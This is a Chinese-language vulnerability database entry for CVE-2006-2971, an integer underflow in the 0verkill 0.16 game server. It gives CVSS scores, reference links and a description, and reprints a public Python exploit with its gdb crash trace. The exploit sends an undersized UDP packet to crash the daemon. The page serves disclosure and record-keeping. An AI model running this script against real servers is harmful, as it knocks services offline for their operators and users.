CVE-2006-2971
CVSS5.0
发布时间 :2006-06-12 16:06:00
修订时间 :2011-03-07 21:37:24
NMCOE    

[原文]Integer overflow in the recv_packet function in 0verkill 0.16 allows remote attackers to cause a denial of service (daemon crash) via a UDP packet with fewer than 12 bytes, which results in a long length value to the crc32 function.


[CNNVD]0verkill recv_packet函数 整数溢出漏洞(CNNVD-200606-229)

        0verkill 0.16中的recv_packet函数存在整数溢出,远程攻击者可通过少于12字节的UDP包,导致传给crc32函数一个长的长度值,来发起拒绝服务攻击(守护程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2971
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2971
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-229
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2245
(UNKNOWN)  VUPEN  ADV-2006-2245
http://www.securityfocus.com/bid/18353
(UNKNOWN)  BID  18353
http://www.securityfocus.com/archive/1/archive/1/436659/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060609 0verkill 0.6, Remote integer overflow
http://secunia.com/advisories/20551
(VENDOR_ADVISORY)  SECUNIA  20551
http://xforce.iss.net/xforce/xfdb/27028
(UNKNOWN)  XF  overkill-recvpacket-integer-underflow(27028)
http://www.osvdb.org/26029
(UNKNOWN)  OSVDB  26029
http://securityreason.com/securityalert/1090
(UNKNOWN)  SREASON  1090

- 漏洞信息

0verkill recv_packet函数 整数溢出漏洞
中危 缓冲区溢出
2006-06-12 00:00:00 2006-06-13 00:00:00
远程  
        0verkill 0.16中的recv_packet函数存在整数溢出,远程攻击者可通过少于12字节的UDP包,导致传给crc32函数一个长的长度值,来发起拒绝服务攻击(守护程序崩溃)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1894)

0verkill 0.16 (ASCII-ART Game) Remote Integer Overflow Crash Exploit (EDBID:1894)
linux dos
2006-06-09 Verified
0 Federico Fazzi
N/A [点击下载]
#!/usr/bin/env python
#
# -----------------------------------------------------
# Exploit id: FSE:016
#
# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:	    09/06/2006, 13:58
# Sinthesis:  0verkill 0.16, Remote integer overflow
# Product:    http://artax.karlin.mff.cuni.cz/~brain/0verkill/
# -----------------------------------------------------
#
# Start with:
# python f_0k-0.1.py <remote_addr> <remote_port>
#

# Proof of concept:
# (gdb) run
# Starting program: /home/federico/0verkill-0.16/server
# 9. 6.2006 14:18:07  Running 0verkill server version 0.16
# 9. 6.2006 14:18:07  Initialization.
# 9. 6.2006 14:18:07  Loading sprites.
# 9. 6.2006 14:18:07  Loading level "level1"....
# 9. 6.2006 14:18:07  Loading level graphics.
# 9. 6.2006 14:18:08  Loading level map.
# 9. 6.2006 14:18:08  Loading level objects.
# 9. 6.2006 14:18:08  Initializing socket.
# 9. 6.2006 14:18:08  Installing signal handlers.
# 9. 6.2006 14:18:08  Game started.
# 9. 6.2006 14:18:08  Sleep
# 9. 6.2006 14:18:10  Wakeup
#
# (run python f_0k-0.6.py)
#
# Program received signal SIGSEGV, Segmentation fault.
# crc32 (buf=0x837a000 <Address 0x837a000 out of bounds>, len=4294967288) at crc32.c:82
# warning: Source file is more recent than executable.
# 82            DO8(buf);
#
# #0  0x0805b54a in recv_packet (packet=0x805fd20 "",
# max_len=256, addr=0xf18df475, addr_len=0xf18df475, sender_server=0, recipient=0,
# sender=0xbfcf6d54) at net.c:94
# 94              if (crc!=crc32(packet,retval-12))return -1;
#
# limits byte receive is 12, if you send an inferior number of it
# the game crash.

import os, sys
from socket import *

usage = "run: python %s [remote_addr] [remote_port] " % os.path.basename(sys.argv[0])

if len(sys.argv) < 3: 
	print usage 
	sys.exit()

host = sys.argv[1]
port = int(sys.argv[2])

sock = socket(AF_INET, SOCK_DGRAM)
sock.connect((host, port))

print "connecting.. ",
if sock > 0:
    print "done!"
else:
    print "wrong!"

print "crashing the server.. ",
if sock.sendto('0x00' , (host, port)):
    print "done!"
else:
    print "wrong!"

print "wait five seconds, if no data found press CTRL+C"
try:
	reply = sock.recvfrom(512)
	print reply
except:
	print "no data receive!"
	sys.exit()

# milw0rm.com [2006-06-09]
		

- 漏洞信息

26029
0verkill recv_packet() Function UDP Handling Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

0verkill contains a flaw that may allow a remote denial of service. The issue is triggered when an integer underflow error occurs in recv_packet() function, and will result in loss of availability for the 0verkill daemon. recv_packet() function is involved in handling the received UDP packets. The attacker can send a UDP packet smaller than 12 bytes to cause the underflow and crash the daemon process thereby causing Denial of Service.

- 时间线

2006-06-09 Unknow
2006-06-09 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站